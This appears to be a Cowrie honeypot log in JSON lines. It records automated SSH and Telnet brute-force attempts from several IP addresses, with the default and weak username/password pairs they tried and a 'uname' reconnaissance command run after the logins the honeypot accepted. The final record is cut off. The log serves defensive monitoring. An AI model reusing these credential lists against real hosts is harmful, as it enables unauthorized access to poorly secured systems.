{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:48.437964Z","src_ip":"45.125.211.194","session":"3c12f00209fd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:49.650070Z","src_ip":"45.125.211.194","session":"3c12f00209fd"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":54839,"dst_ip":"1.2.3.4","dst_port":22,"session":"307dfef14927","protocol":"ssh","message":"New connection: 45.125.211.194:54839 (1.2.3.4:22) [session: 307dfef14927]","sensor":"my-vps","timestamp":"2025-08-28T03:37:02.251850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:02.256317Z","src_ip":"45.125.211.194","session":"307dfef14927"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:02.468088Z","src_ip":"45.125.211.194","session":"307dfef14927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34366,"dst_ip":"1.2.3.4","dst_port":22,"session":"20d446ad88b6","protocol":"ssh","message":"New connection: 212.227.125.160:34366 (1.2.3.4:22) [session: 20d446ad88b6]","sensor":"my-vps","timestamp":"2025-08-28T03:37:02.795998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:02.796991Z","src_ip":"212.227.125.160","session":"20d446ad88b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:03.016648Z","src_ip":"212.227.125.160","session":"20d446ad88b6"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:03.299191Z","src_ip":"45.125.211.194","session":"307dfef14927"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:03.679157Z","src_ip":"212.227.125.160","session":"20d446ad88b6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:04.510213Z","src_ip":"45.125.211.194","session":"307dfef14927"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:04.900732Z","src_ip":"212.227.125.160","session":"20d446ad88b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55244,"dst_ip":"1.2.3.4","dst_port":22,"session":"47ba4715b547","protocol":"ssh","message":"New connection: 212.227.125.160:55244 (1.2.3.4:22) [session: 47ba4715b547]","sensor":"my-vps","timestamp":"2025-08-28T03:37:14.225545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:14.226692Z","src_ip":"212.227.125.160","session":"47ba4715b547"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:14.451312Z","src_ip":"212.227.125.160","session":"47ba4715b547"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:15.124225Z","src_ip":"212.227.125.160","session":"47ba4715b547"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:16.351057Z","src_ip":"212.227.125.160","session":"47ba4715b547"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16343,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b39a68d29d1","protocol":"ssh","message":"New connection: 45.125.211.194:16343 (1.2.3.4:22) [session: 3b39a68d29d1]","sensor":"my-vps","timestamp":"2025-08-28T03:37:17.112811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:17.129044Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:17.321666Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:37:18.151692Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:37:18.662277Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:37:18.662965Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:18.924000Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:18.925016Z","src_ip":"45.125.211.194","session":"3b39a68d29d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33740,"dst_ip":"1.2.3.4","dst_port":23,"session":"8274a758c1e2","protocol":"telnet","message":"New connection: 212.227.235.229:33740 (1.2.3.4:23) [session: 8274a758c1e2]","sensor":"my-vps","timestamp":"2025-08-28T03:37:19.292305Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37758,"dst_ip":"1.2.3.4","dst_port":22,"session":"1791c395a098","protocol":"ssh","message":"New connection: 194.233.79.134:37758 (1.2.3.4:22) [session: 1791c395a098]","sensor":"my-vps","timestamp":"2025-08-28T03:37:24.550915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:25.018161Z","src_ip":"194.233.79.134","session":"1791c395a098"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:25.018799Z","src_ip":"194.233.79.134","session":"1791c395a098"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:27.519374Z","src_ip":"194.233.79.134","session":"1791c395a098"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:29.114855Z","src_ip":"194.233.79.134","session":"1791c395a098"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:30.880160Z","src_ip":"212.227.235.229","session":"4ec07d449af6"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":20679,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb979385021b","protocol":"ssh","message":"New connection: 45.125.211.194:20679 (1.2.3.4:22) [session: cb979385021b]","sensor":"my-vps","timestamp":"2025-08-28T03:37:31.914916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:31.932801Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:32.156456Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:37:33.023582Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:37:33.571560Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:37:33.572252Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:33.795004Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:33.796101Z","src_ip":"45.125.211.194","session":"cb979385021b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40984,"dst_ip":"1.2.3.4","dst_port":22,"session":"3312d527c22a","protocol":"ssh","message":"New connection: 212.227.235.229:40984 (1.2.3.4:22) [session: 3312d527c22a]","sensor":"my-vps","timestamp":"2025-08-28T03:37:34.282134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:34.282878Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:37:34.538346Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:37:35.307025Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:37:35.911107Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:37:35.911804Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:36.167770Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:36.168890Z","src_ip":"212.227.235.229","session":"3312d527c22a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46131,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3bf8b90764b","protocol":"ssh","message":"New connection: 212.227.235.229:46131 (1.2.3.4:22) [session: d3bf8b90764b]","sensor":"my-vps","timestamp":"2025-08-28T03:37:38.981247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:37:39.067875Z","src_ip":"212.227.235.229","session":"d3bf8b90764b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:37:39.196437Z","src_ip":"212.227.235.229","session":"d3bf8b90764b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin888","message":"login attempt [admin/admin888] failed","sensor":"my-vps","timestamp":"2025-08-28T03:37:39.858795Z","src_ip":"212.227.235.229","session":"d3bf8b90764b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:37:40.952371Z","src_ip":"212.227.235.229","session":"d3bf8b90764b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50976,"dst_ip":"1.2.3.4","dst_port":22,"session":"65923fdb9395","protocol":"ssh","message":"New connection: 212.227.125.160:50976 (1.2.3.4:22) [session: 65923fdb9395]","sensor":"my-vps","timestamp":"2025-08-28T03:37:44.163147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:37:44.163903Z","src_ip":"212.227.125.160","session":"65923fdb9395"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@